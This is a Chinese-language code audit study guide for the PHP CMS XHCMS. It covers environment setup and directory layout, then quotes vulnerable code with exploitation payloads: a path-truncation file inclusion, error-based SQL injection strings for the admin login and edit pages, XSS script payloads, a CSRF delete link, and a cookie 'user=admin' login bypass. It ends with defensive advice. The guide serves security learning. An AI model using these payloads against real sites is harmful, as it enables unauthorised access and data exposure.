XHCMS 代码审计学习文档<\/h1>

一、环境搭建<\/h2>

环境要求<\/strong>：<\/p>

PHP 5.4.45<\/li>
MySQL 5.5.53<\/li>
不兼容 PHP 7<\/li> <\/ul> <\/li>

安装步骤<\/strong>：<\/p>

下载 XHCMS 源码并解压到 PHPStudy 根目录<\/li>
启动 PHPStudy<\/li>
创建数据库（如 testxhcms）<\/li>
访问安装页面完成安装<\/li> <\/ul> <\/li> <\/ol>
二、目录结构分析<\/h2>
admin\/ - 管理后台文件夹 css\/ - CSS 文件 files\/ - 页面文件 images\/ - 图片资源 inc\/ - 网站配置文件 install\/ - 安装文件夹 seacmseditor\/ - 编辑器 template\/ - 模板文件 upload\/ - 上传功能 index.php - 网站首页 <\/code><\/pre> 三、漏洞审计<\/h2> 1. 文件包含漏洞<\/h3> 位置<\/strong>：index.php<\/code> 和 admin\/index.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $file=<\/span>addslashes<\/span>($_GET['r'<\/span>]); <\/span><\/span>$action=<\/span>$file==<\/span>''<\/span>?<\/span>'index'<\/span>:<\/span>$file; <\/span><\/span>include<\/span>('files\/'<\/span>.<\/span>$action.<\/span>'.php'<\/span>); <\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p> Windows 系统<\/li> PHP 版本=5.2.17<\/li> Virtual Directory Support=enable<\/li> <\/ul> 利用方法<\/strong>：<\/p> 使用 Windows 文件名长度截断<\/li> Payload: ?r=..\/test.txt........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ <\/code><\/pre> <\/li> <\/ul> 2. SQL 注入漏洞<\/h3> (1) 后台登录注入<\/h4> 位置<\/strong>：\/admin\/files\/login.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $user=<\/span>$_POST['user'<\/span>]; <\/span><\/span>$query =<\/span> "SELECT * FROM manage WHERE user='<\/span>$user<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> POST: user=1' and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-- <\/code><\/pre> (2) 栏目编辑注入<\/h4> 位置<\/strong>：\/admin\/files\/editcolumn.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $id=<\/span>$_GET['id'<\/span>]; <\/span><\/span>$type=<\/span>$_GET['type'<\/span>]; <\/span><\/span>$query =<\/span> "SELECT * FROM nav WHERE id='<\/span>$id<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> ?r=editcolumn&type=1&id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ <\/code><\/pre> (3) 链接编辑注入<\/h4> 位置<\/strong>：\/admin\/files\/editlink.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $id=<\/span>$_GET['id'<\/span>]; <\/span><\/span>$query =<\/span> "SELECT * FROM link WHERE id='<\/span>$id<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> ?r=editlink&id=1' and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+ <\/code><\/pre> (4) 重装注入<\/h4> 位置<\/strong>：\/install\/index.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $query =<\/span> "UPDATE manage SET user='<\/span>$user<\/span>',password='<\/span>$password<\/span>',name='<\/span>$user<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> user=1' or extractvalue(1,concat(0x7e,(select version()),0x7e))# <\/code><\/pre> 3. XSS 漏洞<\/h3> (1) 存储型 XSS<\/h4> 位置<\/strong>：\/admin\/files\/adset.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $ad1=<\/span>addslashes<\/span>($_POST['ad1'<\/span>]); <\/span><\/span>echo<\/span> $ad['ad1'<\/span>]; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> <\/textarea><script>alert('hahhahahaa')<\/script> <\/code><\/pre> (2) 反射型 XSS<\/h4> 位置<\/strong>：\/files\/contact.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $page=<\/span>addslashes<\/span>($_GET['page'<\/span>]); <\/span><\/span>echo<\/span> "第"<\/span>.<\/span>$page.<\/span>"页 - "<\/span>; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> ?r=contact&page=<script>alert(\/xss\/)<\/script> <\/code><\/pre> 4. CSRF 漏洞<\/h3> 位置<\/strong>：\/admin\/files\/linklist.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $delete=<\/span>$_GET['delete'<\/span>]; <\/span><\/span>$query =<\/span> "DELETE FROM download WHERE id='<\/span>$delete<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> 构造恶意链接诱导管理员点击<\/li> <\/ul> 5. 越权漏洞<\/h3> 位置<\/strong>：\/inc\/checklogin.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> 仅通过 cookie 中的 user 字段判断登录状态<\/li> <\/ul> 利用方法<\/strong>：<\/p> 直接添加 cookie: user=admin<\/code><\/li> <\/ul> 四、防御建议<\/h2> SQL 注入防御<\/strong>：<\/p> 使用预处理语句<\/li> 对输入进行严格过滤<\/li> 使用白名单验证<\/li> <\/ul> <\/li> XSS 防御<\/strong>：<\/p> 输出时使用 htmlspecialchars()<\/li> 设置 Content-Security-Policy<\/li> <\/ul> <\/li> CSRF 防御<\/strong>：<\/p> 添加 CSRF Token<\/li> 检查 Referer<\/li> <\/ul> <\/li> 文件包含防御<\/strong>：<\/p> 使用白名单限制包含文件<\/li> 避免动态包含<\/li> <\/ul> <\/li> 越权防御<\/strong>：<\/p> 使用 Session 验证登录状态<\/li> 实现完整的权限验证机制<\/li> <\/ul> <\/li> <\/ol> 五、审计总结<\/h2> XHCMS 存在大量未过滤的 SQL 注入点<\/li> 多处存在存储型和反射型 XSS<\/li> 后台功能普遍缺乏 CSRF 防护<\/li> 登录验证机制存在缺陷<\/li> 文件包含漏洞可导致任意代码执行<\/li> <\/ol> 六、学习要点<\/h2> 审计工具（如 Seay）可辅助发现漏洞，但需人工验证<\/li> 变量追踪是审计的关键技能<\/li> 理解 addslashes() 的局限性<\/li> 注意二次转义问题<\/li> 完整的功能测试比单纯代码审计更重要<\/li> <\/ol>